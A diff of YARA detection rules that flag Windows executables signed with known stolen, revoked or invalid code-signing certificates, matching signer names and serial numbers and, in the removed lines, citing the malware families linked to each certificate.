+		id = "deedbc3a-8c77-5c2c-b3c1-40e5d082ec5a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7801-L7814"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2417-L2428"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8cd1e984bb81f071053614ae9d037d7ff5e01fb95aaa0474492386a7b5faecec"
+		logic_hash = "85efd10f6c49b93215c9f8f97915c62fb3ed3bb158b2137e953022b550263726"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6b18e9451c2e93564ed255e754b7e1cf0f817abda93015b21ae5e247c75f9d03"
-		reason = "Cerber"
+		thumbprint = "885b9f1306850a87598e5230fcae71282042b74e8a14cabb0a904c559b506acb"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEMUS, OOO" and pe.signatures [ i ] . serial == "90:21:24:73:c7:06:f5:23:fe:84:bd:b9:a7:8a:01:f4" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMART TOYS AND GAMES" and pe.signatures [ i ] . serial == "00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_082023879112289Bf351D297Cc8Efcfc : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f79e1a89-c7b4-5390-b20b-3f563f409cfe"
+		id = "292f99be-2eb0-5ad1-bd07-766de7822f1e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7816-L7829"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2430-L2441"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da76d86509aee2f9cac992e6b081dce5e68c747ad34abd2daeb32e6e390b880b"
+		logic_hash = "0747b37139daaba10a17098aeb0c6246290fbd997345de34ce9de8da26d7db05"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "285925b7c7c692f8d71d980dcf2ddb4c208a0f7b826ead34db402755d1a0f6de"
-		reason = "IcedID"
+		thumbprint = "0eb3382177f26e122e44ddd74df262a45ebe8261029bc21b411958a07b06278a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1105 SOFTWARE LLC" and pe.signatures [ i ] . serial == "5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2A2F270535C2D5E7630720Fb229B5D1C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ece6Cbf67Dc41635A5E5D075F286Af23 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3ed98546-92b2-5566-9716-ae8209ece9d6"
+		id = "53312007-179d-547c-8195-0b5d78181300"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7831-L7844"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2443-L2454"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d9785c12d2d744fbafab009edfb1ef232eadcdbc8eee99d0ad0daacabbabf26"
+		logic_hash = "27ecc138f8d574c15095032c35ad51c00d8b98f21162d1f59f1f9ca9e5b54391"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "73a0cc4495a49492806b970fd844a0ab078126930305d22c7bf68b43c337fc1a"
-		reason = "IcedID"
+		thumbprint = "f1f83c96ab00dcb70c0231d946b6fbd6a01e2c94e8f9f30352bbe50e89a9a51c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOZUZ SP. Z O.O." and pe.signatures [ i ] . serial == "2a:2f:27:05:35:c2:d5:e7:63:07:20:fb:22:9b:5d:1c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THRANE AGENTUR ApS" and pe.signatures [ i ] . serial == "00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4659Fa5Fc1E0397Df79Fd6A4083D93B0 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a0d2449c-c1b0-5e6a-9fa3-d8fe8e318c62"
+		id = "65f5e05c-f5cd-53ba-b4ec-7f412aa63796"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7846-L7859"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2456-L2467"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d8a10d77e63d2a62ce45606dd9a317220aa124a50fa95028a45d9f5899ec6e3"
+		logic_hash = "9cec6eae024d738c68d670fb61f7667bdc156245da83e5d0ae0f2012baa5bc0a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "fa5f2dbe813b0270b1f9e53da1be024fb495e8b1848bb3c9c7392a40c8f7e8e6"
-		reason = "RedLineStealer"
+		thumbprint = "026868bbc22c6a37094851e0c6f372da90a8776b01f024badb03033706828088"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Incuber Services LLP" and pe.signatures [ i ] . serial == "46:59:fa:5f:c1:e0:39:7d:f7:9f:d6:a4:08:3d:93:b0" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tramplink LLC" and pe.signatures [ i ] . serial == "5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_651F3E5B491B197D20C49B9C7B25B775 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fb8b4a88-631b-5a5c-ab36-286b74a3a346"
+		id = "c8f66f21-db29-5a5d-a74d-58c152a17bc3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7861-L7874"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2469-L2480"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fe06e8f6fd87d5a9044a6ff609da73b7d9e7d1f07cc9e84ee2fd2940be615323"
+		logic_hash = "fee9662133f0a3d88ce97c27f150bcea8faf21b4c4b97f90bb2aae73ee332bb9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0ee11d5917c486b7a57b7c3c566acec251170e98a577164f36b7d7d34f035499"
-		reason = "NetSupport"
+		thumbprint = "367b3092fbcd132efdbebabdc7240e29e3c91366f78137a27177315d32a926b9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rhynedahll Software LLC" and pe.signatures [ i ] . serial == "65:1f:3e:5b:49:1b:19:7d:20:c4:9b:9c:7b:25:b7:75" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures [ i ] . serial == "6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_67936A84Bed66Ef021Dbe771De331772 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1249Aa2Ada4967969B71Ce63Bf187C38 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2739308a-7396-5fe2-bf1b-fe7e6e5d1f80"
+		id = "3af35255-7583-5463-b130-ebc8abd4803b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7876-L7889"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2482-L2493"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da149e6835be937e0bf2763052d4cbabb367910061aec3c394dffaa45d9b0ac6"
+		logic_hash = "9f8ff46a3b0f5179c2c3b89e82188183fa399c67c3f0ebc28218cf3cb4ce5c70"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8fff75906628b764e99a7a028112a8ec7794097e564f0f897c24c2baaa82ded8"
-		reason = "IcedID"
+		thumbprint = "c139076033e8391c85ba05508c4017736a8a7d9c1350e6b5996dd94b374f403c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APEX SOFTWARE DESIGN, LLC" and pe.signatures [ i ] . serial == "67:93:6a:84:be:d6:6e:f0:21:db:e7:71:de:33:17:72" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbrella LLC" and pe.signatures [ i ] . serial == "12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_8538A6C5018F50Fc : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2Dcd0699Da08915Dde6D044Cb474157C : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8790c06a-3b7a-5e40-9a9c-0f2064029daf"
+		id = "0b4e1d10-d385-5ca8-b9e2-00341a4c6fd9"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7891-L7904"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2495-L2506"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2ef3c7a45eb1d46e6c159ec9692fa5c17ff7679f41d96d04de52aa52ce96fa6b"
+		logic_hash = "096cf4bb17aa86821bd8d6c8b9fd603664beb12f54a97a87e660b560bd0fc246"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d42519dac24abc5c1ebfc6e0da0fd2e7cfb9db50c0598948c6630fdc132c7f94"
-		reason = "Malware"
+		thumbprint = "13bf3156e66a57d413455973866102b0a1f6d45a1e6de050ca9dcf16ecafb4e2"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trading Technologies International, Inc." and pe.signatures [ i ] . serial == "85:38:a6:c5:01:8f:50:fc" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENTE DE TOUT" and pe.signatures [ i ] . serial == "2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Fecc3B3C675F7Ffd7De22507F3Fdacd7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_008D52Fb12A2511E86Bbb0Ba75C517Eab0 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b91a7dcd-6212-5750-9bc8-0eb37d9e129b"
+		id = "04b78a1c-bb2c-5844-933b-f95a0cc8c71e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7906-L7919"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2508-L2519"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1319f4ccb5ab07c1c538d6a183fa25726b3d42192eaa878a2c402be2c93219f7"
+		logic_hash = "23dc0500af88af0e2c8ea7ff2c5a149d24fb7fd23853c4bf5ee5921a66a34672"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6b8cc2be066ff0bf1d884892fc600482fc34eaddb3a5e6681b509d64795b01d4"
-		reason = "RemcosRAT"
+		thumbprint = "9e918ce337aebb755e23885d928e1a67eca6823934935010e82b561b928df2f9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gromit Electronics Limited" and pe.signatures [ i ] . serial == "fe:cc:3b:3c:67:5f:7f:fd:7d:e2:25:07:f3:fd:ac:d7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VThink Software Consulting Inc." and pe.signatures [ i ] . serial == "00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5294F0F841F29855E33A18402421949A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B1Aea98Bf0Ce789B6C952310F14Edde0 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3153f039-afd2-5eb5-b090-b205d9778eb7"
+		id = "9ab5382f-d768-553c-b52c-88d3a3824459"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7921-L7934"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2521-L2532"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9d2b10c4117de276cb41148b41921115f414aa17e261956c8550adf6127d5b9"
+		logic_hash = "f7e8a4a0dcd952129e24e8e9351f271d7ea98ffcb7ef9ebe65c27dcc62e6a820"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "df744f6b9430237821e3f2bc6edafb4a92354dda1734a60d5e0d816256aefb47"
-		reason = "RemcosRAT"
+		thumbprint = "28324a9746edbdb41c9579032d6eb6ab4fd3e0906f250d4858ce9c5fe5e97469"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Integrated Plotting Solutions Limited" and pe.signatures [ i ] . serial == "52:94:f0:f8:41:f2:98:55:e3:3a:18:40:24:21:94:9a" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Absolut LLC" and pe.signatures [ i ] . serial == "00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1614Ef66B2C4B886E71A93Dd34869F48 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00F097E59809Ae2E771B7B9Ae5Fc3408D7 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "27bead15-f7fa-55a1-9347-ea551e1e0e18"
+		id = "edd8674d-7d45-5f77-aa47-3fbe32176324"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7936-L7949"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2534-L2545"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "26265d54d8b58128c1a9a3b322f339d1beb438f403637519b11ff324af91d1e2"
+		logic_hash = "817876ab8e649b36cac2e7b23d58fe94963c55481fbf3deff7e60a70896af6d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1689697e08dda6d1233c0056078ddf25b12c3608ead7d96ed4cbbb074e54ce29"
-		reason = "RemcosRAT"
+		thumbprint = "22ad7df275c8b5036ea05b95ce5da768049bd2b21993549eed3a8a5ada990b1e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHIRT AND CUFF LIMITED" and pe.signatures [ i ] . serial == "16:14:ef:66:b2:c4:b8:86:e7:1a:93:dd:34:86:9f:48" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABEL RENOVATIONS, INC." and pe.signatures [ i ] . serial == "00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_65Cfd8419D70Ce4011D97Bc79D18315E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2E8023A5A0328F66656E1Fc251C82680 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2368b3d1-1cd5-575b-a3ff-270349563d1a"
+		id = "192695ab-2f38-5a0b-98ba-5c800f6b9ec1"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7951-L7964"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2547-L2558"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "675ab6ef0f744f62db892992c6b3614e14b95f64e2800a0d10e55b915a2b4e74"
+		logic_hash = "5f0ff46d6cb2a6fe50a4e433dfbf8f62acd92b7c92d922680894fdaee2558d31"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7cff10e37a43843e971f02ca6ad6510f08a5209d21745181fc4d003a8287cd1b"
-		reason = "BumbleBee"
+		thumbprint = "e3eff064ad23cc4c98cdbcd78e4e5a69527cf2e4"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FACE AESTHETICS LTD" and pe.signatures [ i ] . serial == "65:cf:d8:41:9d:70:ce:40:11:d9:7b:c7:9d:18:31:5e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Philippe Mantes" and pe.signatures [ i ] . serial == "2e:80:23:a5:a0:32:8f:66:65:6e:1f:c2:51:c8:26:80" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_01Cf0B0F01B20B70Bfaa69722979Ef5C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_38B0Eaa7C533051A456Fb96C4Ecf91C4 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "23f5047d-b8f9-5f17-9add-6e29dce9a976"
+		id = "1133fb37-2616-5d95-83da-554d9a5a5373"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7966-L7979"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2560-L2571"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5942c0196d7264783590c599ccfb0fe6518b338238ddb3df4e4f8999922ce86b"
+		logic_hash = "3ea8eaf1fc17075a8c1f34f9b1d8a987071d58a4b68bed70db763402a9a6de97"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ef10480ab6448e60bdc689fc54cb6cfc4a8e1d39ddc788ce3d060ab4b7d30b59"
-		reason = "Ryuk"
+		thumbprint = "8e2e69b1202210dc9d2155a0f974ab8c325d5297"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PET PLUS PTY LTD" and pe.signatures [ i ] . serial == "01:cf:0b:0f:01:b2:0b:70:bf:aa:69:72:29:79:ef:5c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marianne Septier" and pe.signatures [ i ] . serial == "38:b0:ea:a7:c5:33:05:1a:45:6f:b9:6c:4e:cf:91:c4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_698Ff388Adb50B88Afb832E76B0A0Ad1 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_738Db9460A10Bb8Bc03Dc59Feac3Be5E : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8118e0ee-6214-54f3-b025-234f9e685832"
+		id = "3451fe9d-067a-57ea-9df1-35d427d8c71a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7981-L7994"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2573-L2584"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7734256201739dece5ae039d45ed79c74be6228f7da51fc82c0cfd2d4aacfd4b"
+		logic_hash = "6a7060f2a5867e9974cb01de516ef34fb367ef9acf88e2f63c97dd05b1676504"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "479e01dde7e7529ed4ad111a2d7b3b16fdc6fbe2ed0d6ff015c1c823ca0939db"
-		reason = "IcedID"
+		thumbprint = "4cf77e598b603c13cdcd1a676ca61513558df746"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BELLAP LIMITED" and pe.signatures [ i ] . serial == "69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jocelyn Bennett" and pe.signatures [ i ] . serial == "73:8d:b9:46:0a:10:bb:8b:c0:3d:c5:9f:ea:c3:be:5e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5143Cf38D5Fd26858830826632Be9Fda : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_141D6Dafed065980D97520E666493396 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "653a969a-9aed-5a26-9962-92bc173ddfdd"
+		id = "1a2e44d7-b801-5c3e-bf74-616f211c6d93"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7996-L8009"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2586-L2597"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b6f33fd94f8098ca9d4fe98b3dc0a833f0be78fe854c62d715b98a2ba980b8ac"
+		logic_hash = "37ed05b7a472ec6cbc1bba453f3be9ca1bd590ed6470d6607873ef52b28e3ea5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "57a8aa854f3198f069bb34bc763b7773a8cfdafb562ee0ccf24a5067d45d5e3c"
-		reason = "BumbleBee"
+		thumbprint = "28225705d615a47de0d1b0e324b5b9ca7c11ce48"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGI CORP MEDIA LLC" and pe.signatures [ i ] . serial == "51:43:cf:38:d5:fd:26:85:88:30:82:66:32:be:9f:da" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ralph Schmidt" and pe.signatures [ i ] . serial == "14:1d:6d:af:ed:06:59:80:d9:75:20:e6:66:49:33:96" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3628B93Bcd902B6B3E1Ffdf2E13Dfcf5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_07Cf63Bdccc15C55E5Ce785Bdfbeaacf : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8b8fa36d-181b-57a1-853e-ab11a5127fd7"
+		id = "7bdc16ed-ff95-5e96-bfe9-ad326c77c82a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
